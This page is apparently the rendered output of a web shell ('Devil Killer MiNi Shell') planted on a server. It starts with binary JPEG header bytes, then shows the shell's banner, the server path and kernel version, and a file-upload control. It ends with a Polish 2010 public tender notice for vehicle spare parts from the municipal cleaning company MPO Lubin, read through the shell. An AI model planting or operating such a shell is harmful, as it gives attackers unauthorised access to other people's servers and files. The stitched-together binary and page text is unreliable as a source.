JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100223/38003-N-2010.html

<p class="kh_header"><b>Lubin: SUKCESYWNA DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU I ŚRODKÓW TRANSPORTU DLA MPO SP. Z O.O.</b><br>
<b>Numer ogłoszenia: 38003 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania sp. z o.o. w Lubinie , ul. Rzeźnicza 1, 59-300 Lubin, woj. dolnośląskie, tel. (076) 7249940, faks (076) 7249950.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU I ŚRODKÓW TRANSPORTU DLA MPO SP. Z O.O..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa części zamiennych do sprzętu i środków transportu dla Miejskiego Przedsiębiorstwa Oczyszczania Spółka z o.o. w Lubinie, których rodzaj i ilość określono   
w poszczególnych pakietach od nr 1 do nr 24 stanowiących załącznik nr 2 do - (Wykaz części-formularz cenowy) do niniejszej Specyfikacji Istotnych Warunków Zamówienia. Wymagania ogólne dla wszystkich pakietów (części)
1.Ilość i rodzaj zamawianych części będzie zależeć od zaistniałych potrzeb Zamawiającego. 
2.Zamawiający zastrzega sobie prawo do niezrealizowania całego przedmiotu zamówienia określonego w załączniku nr 2 do SIWZ w pakietach od nr 1 do nr 24.
4.Wymagane jest, aby części zamienne będące przedmiotem zamówienia były dostarczane jako oryginalne części zamienne lub jako części zamienne o porównywalnej jakości, które będą fabrycznie nowe, kompletne, sprawne, opakowane i pokryte środkiem konserwującym.
5.  Zgodnie z Rozrządzeniami Rady Ministrów pod pojęciem:
Oryginalnej części zamiennej - należy rozumieć części zamienne o tej samej jakości co komponenty stosowane do montażu pojazdu samochodowego, produkowane zgodnie specyfikacjami i standardami produkcyjnymi, ustalonymi przez producenta tych pojazdów dla produkcji komponentów lub części zamiennych danego pojazdu samochodowego, w tym części zamienne produkowane na tej samej linii produkcyjnej, co komponenty danego pojazdu samochodowego; przyjmuje się że części zamienne są oryginalne, jeżeli producent tych części zaświadczy, że zostały one wyprodukowane zgodnie ze specyfikacją i standardami produkcyjnymi ustalonymi przez producenta danych pojazdów i są one tej samej jakości co części stosowane do montażu tych pojazdów , zgodnie z § 2 pkt. 20 Rozporządzenia Rady Ministrów z dnia 28.01.2003 roku w sprawie wyłączenia określonych porozumień wertykalnych sektorze pojazdów samochodowych spod zakazu porozumień ograniczających konkurencję (Dz. U. Nr 38, poz. 329 z późn. zm.).
Części zamienne o porównywalnej jakości - należy rozumieć części zamienne, których producent zaświadczy, że są one tej samej jakości co komponenty, które są lub były stosowane do montażu danych pojazdów samochodowych, zgodnie z § 2 pkt. 21 Rozporządzenia Rady Ministrów z dnia 28.01.2003 roku w sprawie wyłączenia określonych porozumień wertykalnych  sektorze pojazdów samochodowych spod zakazu porozumień ograniczających konkurencję (Dz. U. Nr 38, poz. 329 z późn. zm. )
Warunki płatności:
1.Zamawiający dokona zapłaty po dostawie przedmiotu zamówienia (danej części) 
w terminie 14 dni od daty otrzymania prawidłowo sporządzonej faktury VAT.
2.Podstawą wystawienia faktury VAT będzie dokument potwierdzający, otrzymanie przedmiotu zamówienia (danej części) wystawiony przez Wykonawcę i podpisany przez Zamawiającego.
3.Wykonawca zapłaci za rzeczywistą ilość dostarczanych części do Zamawiającego.
4.Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze 
z tytułu dostarczenia mniejszej ilości części, niż określone w załączniku Nr 2 do SIWZ.
Warunki dostawy:
1.Wykonawca zobowiązany jest do realizacji dostaw cząstkowych przedmiotu zamówienia w terminie nie dłuższym niż 48 godzin od chwili telefonicznego lub pisemnego zamówienia przesłanego faksem złożonego przez wyznaczonego pracownika Zamawiającego w ilości wskazanej w cząstkowym zamówieniu.
2.W przypadku konieczności natychmiastowego usunięcia niesprawności pojazdu Wykonawca zapewni  dostawę części samochodowej w ciągu 24 godzin od chwili telefonicznego lub pisemnego zamówienia przesłanego faksem przez wyznaczonego pracownika. W sytuacji nie zrealizowania dostawy w tym terminie Zamawiający zastrzega sobie prawo nabycia części samochodowej u innego Dostawcy.
3.Dostawy części samochodowych w asortymencie i ilościach wskazanych przez Zamawiającego, Wykonawca będzie dostarczał na własny koszt do warsztatu samochodowego Spółki przy ul. Rzeźniczej 1, 59-300 Lubin (od poniedziałku do piątku) w godz. 7.00-15.00.
Warunki gwarancji i rękojmi:
1.Wykonawca zapewnia, iż termin gwarancji i rękojmi na przedmiot zamówienia jest nie krótszy niż 12 miesięcy od dnia dostarczenia, lub dłuższy, jeżeli przewiduje to ich producent.
2.Za datę rozpoczęcia biegu terminu gwarancji i rękojmi przyjmuje się datę dostawy danej części.
Reklamacja dostaw:
1.Reklamacja ilościowa:
a)Zamawiający w terminie 7 dni od chwili zrealizowania dostawy zawiadomi Wykonawcę o rozbieżności między ilością towaru określonego w zamówieniu, a ilości dostarczoną do Zamawiającego, przesyłając faksem zgłoszenie reklamacyjne zawierające uzasadnienie reklamacji,
b)załatwienie uznanych reklamacji ilościowych będzie następować w ciągu 2 dni poprzez: odpowiednie uzupełnienie dostawy uwzględniające faktycznie dostarczoną ilość towaru lub rozliczenie finansowe, polegające na obniżeniu wartości dostawy stosownie do ilości faktycznie dostarczonego towaru.
c)nie udzielenie odpowiedzi na zgłoszoną reklamację ilościową w ciągu 2 dni od dnia jej doręczenia faksem uważa się za uznanie reklamacji za uzasadnioną.
2.Reklamacja jakościowa:
a)W przypadku zastrzeżeń dotyczących jakości dostarczonego towaru oraz jego niegodności ze złożona ofertą, opisem przedmiotu zamówienia i specyfikacją istotnych warunków zamówienia, Zamawiający w terminie 7 dni od chwili zrealizowania dostawy zawiadomi wykonawcę o swoich zastrzeżeniach przesyłając mu faksem zgłoszenie reklamacyjne zawierające uzasadnienie reklamacji.  
b)reklamacje Zamawiającego będą załatwiane przez Wykonawcę nie później niż w ciągu 7 dni od daty otrzymania zgłoszenia reklamacyjnego. Dostarczenie nowego, wolnego od wad  przedmiotu zamówienia nastąpi na koszt i ryzyko Wykonawcy.
c)nie udzielenie odpowiedzi na zgłoszoną reklamację w ciągu 7 dni od jej otrzymania uważa się za uznanie reklamacji za uzasadnioną.
3.Wizja lokalna: z powodu występujących sporadycznych przypadków zamontowania w pojazdach i sprzęcie innych części zamiennych niż oryginalne, zaleca się oferentom w celu uzyskania wszelkich informacji koniecznych do właściwego przygotowania oferty i zawarcia  umowy o dokładne zapoznanie się z budową i konstrukcją pojazdów i sprzętu, dla których Zamawiający ogłosił przetarg. Zamawiający udostępnia jego oględziny w dni robocze od godz. 7.00-15.00.
Wykaz Pakietów będących przedmiotem zamówienia:  
Pakiet Nr 1 - części zamienne do samochodów: 
-SCANIA 6X2 VIN XLEP6X20005205490, nr rej. DLU 81WE,                                  rok produkcji 2008
-SCANIA 6X2, VIN YS2PX20001280243, nr rej. DLU R928,   rok produkcji 2002
-SCANIA  P 94 GB, VIN YS2P4X20001242965, nr rej. DLU A519,rok produkcji 1999   
Pakiet Nr 2 - części zamienne do samochodów: 
-VOLVO  FM - 09C1R/SM, VIN YV2JHCOCX5A599506, nr rej. DLU 1V95,rok produkcji 2005
Pakiet Nr 3 - części zamienne do samochodów: 
-JELCZ 422 240 R6, VIN SUJP422BAV0000454, nr rej. LGF 3309,rok produkcji 1997
-JELCZ 422 240 R6, VIN SUJP422BAT0000346, nr rej. LIE 0589, rok produkcji 1996
-JELCZ 422 240 R6, VIN SUJP422BAT0000400, nr rej. DLU 00418, rok produkcji 1996
Pakiet Nr 4 - części zamienne do samochodu: 
-STAR 742, VIN SUSAFA2B5MA000217, nr rej. LCE 8656, rok produkcji 1992
Pakiet Nr 5 - części zamienne do samochodu:
-RENAULT PREMIUM  410.26 6x4, VIN VF624DPA000000192 , 
nr rej. DLU 29XW, rok produkcji 2008
Pakiet Nr 6 - części zamienne do samochodów: 
-VOLVO  FL6, VIN YV2E4CAA44B354400 , nr rej. DLU 1G05,rok produkcji 2003
-VOLVO  FL6/W, VIN YV2E4CAA35B391679, nr rej. DLU 9U49, rok produkcji 2004
Pakiet Nr 7 - części zamienne do samochodów: 
-JELCZ 317  PHN2, NR 20581, nr rej. LGE 430D, rok produkcji 1991
-JELCZ 325 P, NR 21099, nr rej. LCE 7817, rok produkcji 1992
-JELCZ 325 JPM 1, VIN SUJP325POE0011967, nr rej. LGE 730C, rok produkcji 1989
Pakiet Nr 8 - części zamienne do samochodów: 
-STAR 1500 1142, VIN DLU001030058, nr rej. DLU U611, rok produkcji 2000
-STAR  1500 1142, VIN SUS1142CFX0014966, nr rej. DLU U609,rok produkcji 1999                                                
Pakiet Nr 9 - części zamienne do samochodu: 
-MERCEDES-BENZ Atego 1518  LKO, VIN WDB9752621L236663,nr rej. DLU 01106, rok produkcji 2007
Pakiet Nr 10 - części zamienne do samochodu:
-MERCEDES-BENZ 917KD, VIN WDB6760902K209070, nr rej. LIE 3048, rok produkcji 1996
Pakiet Nr 11 - części zamienne do samochodów: 
-LIAZ 110.850, VIN TNKK54101KS000246, nr rej. LGE 988D,rok produkcji 1989
-LIAZ 110.850, VIN D2D0018, nr rej. DLU 95XA, rok produkcji 1988
Pakiet Nr 12 - części zamienne do samochodów: 
-CRAFTER 2FJE2,  VIN WV1ZZZ2F87007872, nr rej. DLU 08VW,                           rok produkcji 2008
-CRAFTER 2FJZ,   VIN WV1ZZZ2FZ97002560, nr rej. DLU 14WS,                         rok produkcji 2008
-CRAFTER 2FJZ,   VIN WV1ZZZ2FZ87003818, nr rej. DLU 98NW,rok produkcji 2007
-CRAFTER 2FJZ,   VIN WV1ZZZ2F87003819, nr rej. DLU 94NW,                            rok produkcji 2007
Pakiet Nr 13 - części zamienne do samochodu: 
-RENAULT  Megane Scenic, VIN VFJAOGO517367093  , nr rej. LIE 5044,rok produkcji 1997
Pakiet Nr 14 - części zamienne do samochodu: 
-MULTICAR M26 A TD, VIN WMU2M26231W100704, nr rej. DLU H072,                   rok produkcji 2000
Pakiet Nr 15 - części zamienne do samochodu: 
-ŻUK A16 D, VIN SUL16121IT058411 nr rej. DLU 6W08,                                       rok produkcji 1996
Pakiet Nr 16 - części zamienne do samochodu:
-VOLKSWAGEN T4, VIN WV12227021X047057 nr rej. DLU H603,                            rok produkcji 2000                          
Pakiet Nr 17 - części zamienne do samochodu:
-OSTRÓWEK  KT-162, NR 646668  nr rej. LGE 297E, rok produkcji 1992
Pakiet Nr 18- części zamienne do samochodu:
-PRONAR MTZ 320 AMK, VIN 01270A nr rej. DLU M531,  rok produkcji 2005 
Pakiet Nr 19 - części zamienne do samochodu:
-URSUS C-360, NR 658185   nr rej. LCE 1613, rok produkcji 1992
Pakiet Nr 20- części zamienne do samochodu:
-NEW HOLLAND, H TCE 50, VIN HSSZ16610,  nr rej. DLU M49,                              rok produkcji 2007
Pakiet Nr 21 - części zamienne do samochodu:
-MT-8 150.32, NR 2019       nr rej. LCE 1796, rok produkcji 1995
Pakiet Nr 22- części zamienne do samochodu:
-MAN TGM 18.280 4x2 BB, VIN WMAN08Y215447, nr rej. DLU 28XL,                     rok produkcji 2009
Pakiet Nr 23 - części zamienne luzem do wszystkich typów pojazdów i sprzętu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt  7 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegającego na rozszerzeniu dostawy, jeżeli zmiana Wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych co powodowałoby niekompatybilność  techniczną lub nieproporcjonalne duże trudność techniczne w użytkowaniu i dozorze.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 4 do SIWZ.
Ocena spełnienienia warunku zostanie dokonana sprawdzając kompletność, poprawność oraz aktualność złozonego oświadczenia wg formuły: SPEŁNIA - NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 4 do SIWZ.
Ocena spełnienienia warunku zostanie dokonana sprawdzając kompletność, poprawność oraz aktualność złozonego oświadczenia wg formuły: SPEŁNIA - NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 4 do SIWZ.
Ocena spełnienienia warunku zostanie dokonana sprawdzając kompletność, poprawność oraz aktualność złozonego oświadczenia wg formuły: SPEŁNIA - NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 4 do SIWZ.
Ocena spełnienienia warunku zostanie dokonana sprawdzając kompletność, poprawność oraz aktualność złozonego oświadczenia wg formuły: SPEŁNIA - NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 4 do SIWZ.
Ocena spełnienienia warunku zostanie dokonana sprawdzając kompletność, poprawność oraz aktualność złozonego oświadczenia wg formuły: SPEŁNIA - NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Wypełniony Formularz ofertowy zgodnie z załącznikiem nr 1 do SIWZ, wraz 
z Załącznikiem nr 2 do SIWZ Wykaz części - Formularz cenowy ( należy dołączyć formularz cenowy za pakiet na który wykonawca składa ofertę).
b)Wypełniony załącznik Nr 7 - informacja dotycząca tej części zamówienia, którą Wykonawca zamierza powierzyć podwykonawcom - dołączenie tego załącznika jest niezbędne jedynie w przypadku zaangażowania podwykonawców. 
c)Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku jeżeli uprawnienie do podpisania oferty i reprezentowania podmiotu nie wynika z dokumentów dołączonych do oferty.
d)Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu - tylko w przypadku złożenia oferty wspólnej.
Pełnomocnictwo  zgodnie z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 - Kodeks Cywilny (DZ. U. Nr 16, poz. 93 z późn. zm. ) winno być złożone w formie oryginału lub kopii poświadczonej notarialnie. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z o.o.
ul. Rzeźnicza 1
59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 09:00, miejsce: Miejskie Przedsiebiorstwo Oczyszczania Spółka z o.o. , ul. Rzeźnicza 1, 59-300 Lubin w sekretariacie pokój 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - części zamienne do samochodów: 
-SCANIA 6X2 VIN XLEP6X20005205490, nr rej. DLU 81WE, rok produkcji 2008
-SCANIA 6X2, VIN YS2PX20001280243, nr rej. DLU R928,   rok produkcji 2002
